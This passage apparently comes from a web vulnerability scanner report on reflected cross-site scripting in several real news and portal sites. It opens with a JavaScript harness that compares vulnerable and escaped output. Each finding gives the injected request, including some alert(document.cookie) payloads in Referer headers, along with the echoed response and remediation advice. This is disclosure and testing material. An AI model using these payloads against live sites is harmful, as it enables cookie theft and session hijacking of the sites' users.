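function pageQueryLineVulnerable(rawQuery) {
  return `$iTXT.js.pageQuery='${rawQuery}';`;
}

// Hardened version of the same line.
function pageQueryLineSafe(rawQuery) {
  return `$iTXT.js.pageQuery='${jsStringEscape(rawQuery)}';`;
}

// The /v4/init response shows a second mistake: a parameter map serialised by
// hand, escaping '=' as \u003d but leaving '"' untouched.
function paramsLineVulnerable(params) {
  const body = Object.keys(params)
    .map((k) => `"${k.replace(/=/g, '\\u003d')}":"${params[k].replace(/=/g, '\\u003d')}"`)
    .join(',');
  return `$iTXT.glob.params={${body}};`;
}

// JSON.stringify escapes every string delimiter; '<' is escaped on top so the
// output stays inert even if it is ever inlined into an HTML document.
function paramsLineSafe(params) {
  return `$iTXT.glob.params=${JSON.stringify(params).replace(/</g, '\\u003c')};`;
}

// Run a response line the way a browser would, with alert() stubbed, and report
// whether injected code executed and what the application variables ended up as.
function execute(scriptLine) {
  const $iTXT = { js: {}, glob: {} };
  let fired = false;
  const alert = () => { fired = true; };
  try {
    new Function('$iTXT', 'alert', scriptLine)($iTXT, alert);
  } catch (e) {
    return { fired, error: e.constructor.name };
  }
  return { fired, error: null, pageQuery: $iTXT.js.pageQuery, params: $iTXT.glob.params };
}

// Constructed inputs reproducing the scanner's single- and double-quote payloads.
const SINGLE_QUOTE_QUERY = "ipid=10231&e22c2'-alert(1)-'8d2186b5fd6=1";
const DOUBLE_QUOTE_PARAMS = { ipid: '10231', 'fbbb8"-alert(1)-"b15924c4453': '1' };
```

Running the harness shows the three outcomes a practitioner should expect: the vulnerable single-quoted line calls alert(), the hand-rolled object literal with the double-quoted payload fails to parse at all (which is why that particular scanner payload does not fire even though the reflection is real), and both hardened lines execute cleanly with the attacker text preserved as ordinary string data.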
1.104. http://es.engadget.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://es.engadget.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cedc8"-alert(1)-"2d1d201c850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cedc8"-alert(1)-"2d1d201c850=1 HTTP/1.1 Host: es.engadget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Engadget en español ...[SNIP]... annel="wb.engadgetsp"; s_265.pageType=""; s_265.linkInternalFilters="javascript:,es.engadget.com"; s_265.mmxgo = true; s_265.prop1="Inactive"; s_265.prop2="Home"; s_265.prop12="http://es.engadget.com/?cedc8"-alert(1)-"2d1d201c850=1"; s_265.prop16="Engadget en español"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="247";
var s_code=s_265.t();if(s_code)document.write(s_co ...[SNIP]...
1.105. http://fantasy.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fantasy.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31dbc"-alert(1)-"afc965ac949 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?31dbc"-alert(1)-"afc965ac949=1 HTTP/1.1 Host: fantasy.fanhouse.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f4c8<script>alert(1)</script>e89e8f1416c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response. Note that this fonts.citysbest.com response, like the two that follow it, is a 404 served with Content-Type: text/plain; a browser that honours the declared type will not execute the script, so exploitability depends on content sniffing and the practical risk is lower than for the HTML responses elsewhere in this report. Adding X-Content-Type-Options: nosniff, and HTML-encoding the path in the error body anyway, closes it.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000820 Content-Length: 68 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:33:30 GMT Connection: close
Not Found: /k8f4c8<script>alert(1)</script>e89e8f1416c/uni0vle-e.css
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e302f<script>alert(1)</script>440171cb83a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a?3bb2a6e53c9684ffdc9a9afe1b5b2a62161fbabe860bcaa1511187a688f40137427ddfe1e23e854aa7ae99cf666e8bb2e4a145fd987672fc579851ac33383c64a404166105abae023ce7c3a10a67aa5895 HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.000805 Content-Length: 68 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 20:33:30 GMT Connection: close
Not Found: /k/uni0vle-e.csse302f<script>alert(1)</script>440171cb83a
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload eb692<script>alert(1)</script>13f97bad00a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /uni0vle.jseb692<script>alert(1)</script>13f97bad00a HTTP/1.1 Host: fonts.citysbest.com Proxy-Connection: keep-alive Referer: http://www.citysbest.com/mapquestaa8d4%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253efe33dffe06e/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: nginx/0.8.36 Content-Type: text/plain Status: 404 Not Found X-Runtime: 0.001252 Content-Length: 63 Vary: Accept-Encoding Date: Sun, 06 Feb 2011 21:46:56 GMT Connection: close
Not Found: /uni0vle.jseb692<script>alert(1)</script>13f97bad00a
1.109. http://golf.fanhouse.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://golf.fanhouse.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3cc6"-alert(1)-"97283dc744a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?f3cc6"-alert(1)-"97283dc744a=1 HTTP/1.1
Host: golf.fanhouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.110. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://green.autoblog.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dafda"><script>alert(1)</script>dce0aa22300 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?dafda"><script>alert(1)</script>dce0aa22300=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <link rel="canonical" href="http://green.autoblog.com/?dafda"><script>alert(1)</script>dce0aa22300=1"/> ...[SNIP]...
1.111. http://green.autoblog.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://green.autoblog.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd9f0"-alert(1)-"f846c73bc45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?fd9f0"-alert(1)-"f846c73bc45=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... _265.pageType=""; s_265.linkInternalFilters="javascript:,autobloggreen.com,green.autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Home"; s_265.prop12="http://green.autoblog.com/?fd9f0"-alert(1)-"f846c73bc45=1"; s_265.prop16="Autoblog Green — We Obsessively Cover The Green Scene"; s_265.prop18=""; s_265.prop19=""; s_265.prop20="";
var s_code=s_265.t();if(s_code)document.write(s_code)//--> ...[SNIP]...
1.112. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fe6d6"-alert(1)-"cc4365a87c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... green.autoblog.com"; s_265.mmxgo = true; s_265.prop1="Autoblog"; s_265.prop2="Post"; s_265.prop12="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?fe6d6"-alert(1)-"cc4365a87c2=1"; s_265.prop16="Video: How apartment dwellers can charge their electric vehicles — Autoblog Green"; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop9="bsd:19829683";
var s_code=s ...[SNIP]...
1.113. http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45b2f"><script>alert(1)</script>bb0719d741c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1 HTTP/1.1
Host: green.autoblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap ...[SNIP]... <link rel="canonical" href="http://green.autoblog.com/2011/02/04/video-how-apartment-dwellers-can-charge-their-electric-vehicles/?45b2f"><script>alert(1)</script>bb0719d741c=1"/> ...[SNIP]...
1.114. http://help.aol.com/help/product/aim [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://help.aol.com
Path: /help/product/aim
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d38f"><script>alert(1)</script>58a51860742 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /help/product/aim?1d38f"><script>alert(1)</script>58a51860742=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type ...[SNIP]... <TextArea name="1d38f"><script>alert(1)</script>58a51860742" style="display:none;visibility:hide"> ...[SNIP]...
1.115. http://help.aol.com/help/product/aim/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://help.aol.com
Path: /help/product/aim/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15650"><script>alert(1)</script>bae15fcead9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /help/product/aim/?15650"><script>alert(1)</script>bae15fcead9=1 HTTP/1.1
Host: help.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script type ...[SNIP]... <TextArea name="15650"><script>alert(1)</script>bae15fcead9" style="display:none;visibility:hide"> ...[SNIP]...
1.116. http://japanese.engadget.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://japanese.engadget.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1e744"-alert(1)-"5dc6583bede was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?1e744"-alert(1)-"5dc6583bede=1 HTTP/1.1
Host: japanese.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload c0c31<script>alert(1)</script>91610088e03 was submitted in the ct parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 93
// Error: Unknown old section MACNN_HOMEPAGE_AND_ROSc0c31<script>alert(1)</script>91610088e03
1.118. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 11208<script>alert(1)</script>01e1e582feb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTA&num=7&layt=templatebottom&fmt=simp&11208<script>alert(1)</script>01e1e582feb=1 HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:07 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:07 GMT
Content-Type: application/x-javascript
Content-Length: 69
The value of the tr request parameter is copied into the HTML document as plain text between tags. The payload aec99<script>alert(1)</script>9252672da8b was submitted in the tr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=85&ct=MACNN_HOMEPAGE_AND_ROS&tr=ELECTRONISTAaec99<script>alert(1)</script>9252672da8b&num=7&layt=templatebottom&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
Proxy-Connection: keep-alive
Referer: http://www.electronista.com/articles/11/02/04/sales.of.glasses.free.3d.tvs.weaker.than.expected/?e4c13%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ec3b351ab889=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Connection: close
Date: Sun, 06 Feb 2011 20:37:04 GMT
Server: Microsoft-IIS/6.0
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Sun, 06 Feb 2011 20:37:04 GMT
Content-Type: application/x-javascript
Content-Length: 86
// Error: Site 85 has no section ELECTRONISTAaec99<script>alert(1)</script>9252672da8b
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 6e2a8<script>alert(1)</script>5664779b5a2 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 06 Feb 2011 20:19:22 GMT
Cache-Control: max-age=86400, private
Expires: Mon, 07 Feb 2011 20:19:22 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Date: Sun, 06 Feb 2011 20:19:21 GMT
Content-Length: 128
/*
 * JavaScript include error:
 * The customer code "J055326E2A8<SCRIPT>ALERT(1)</SCRIPT>5664779B5A2" was not recognized.
 */
1.121. http://kr.engadget.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://kr.engadget.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db35a"-alert(1)-"5ea201beed3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?db35a"-alert(1)-"5ea201beed3=1 HTTP/1.1
Host: kr.engadget.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aa475<script>alert(1)</script>947c52ed946 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
Response
HTTP/1.1 404 Not Found
Content-Type: text/plain
ntCoent-Length: 145
X-Response-Time: 0ms
Date: Sun, 06 Feb 2011 20:41:46 GMT
Connection: keep-alive
Content-Length: 145
Cannot GET /learn.jsaa475<script>alert(1)</script>947c52ed946?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 96580<script>alert(1)</script>baa2a9fd9f7 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /learn.js?namespace=bgsmth&partial=db8be26461d3c04c280076f8a2511da299dbe425&callback=learn_cb96580<script>alert(1)</script>baa2a9fd9f7 HTTP/1.1
Host: learn2.aol.com
Proxy-Connection: keep-alive
Referer: http://www.gadling.com/?d7f2b%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eab70c602dd2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|269781FA051D367C-60000130A002AC5E[CE]; mbox=check#true#1297021767|session#1297021706926-216891#1297023568|PC#1297021706926-216891.17#1298231321; UNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; CUNAUTHID=1.e107840a322911e0a718c3f47aca732a.59ff; bandType=broadband; s_pers=%20s_getnr%3D1297023688615-Repeat%7C1360095688615%3B%20s_nrgvo%3DRepeat%7C1360095688616%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolcomqadev%252Cdevaolsvc%253D%252526pid%25253Dundefined%25252520%2525253A%25252520%2525255BUndefined%25252520Page%25252520Name%2525255D%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//about.aol.com/sitemap/%252526ot%25253DA%3B
The value of the ADREQ&SP request parameter is copied into the HTML document as plain text between tags. The payload 3cf3a<a>c5232a83a81 was submitted in the ADREQ&SP parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mac-ad?GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1 HTTP/1.1
Host: mads.cbs.com
Proxy-Connection: keep-alive
Referer: http://www.cbs.com/primetime/big_bang_theory/video/?4c0f6%22-alert(document.cookie)-%22e4eac61e9e2=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CBS_ADV_VAL=b; MADTEST=1
/* MAC ad *//* NO AD TEXT: _QUERY_STRING="GLOBAL&CLIENT:ID=SJS&CELT=js&PAGESTATE=&SITE=164&PTYPE=6711&BRAND=57&DVAR_SESSION=b&DVAR_GENRE=comedy&NCAT=19650%3A19806%3A&NODE=19806&cookiesOn=1&DVAR_INSTLANG=en-US&x-cb=81503859&ADREQ&SP=803cf3a<a>c5232a83a81&POS=100&cookiesOn=1" _REQ_NUM="0" *//* MAC-AD STATUS: COULD NOT MAP ( _MAPPINGS='CBS' BRAND='57' SITE='164' SP='803352328381' CNET-PTYPE='6711' POS='100' NCAT='19650:19806:' CNET-PARTNER-ID='1' DVAR_ ...[SNIP]...
The value of the ADREQ&beacon request parameter is copied into the HTML document as plain text between tags. The payload fc4eb<a>1f38f7daa6b was submitted in the ADREQ&beacon parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
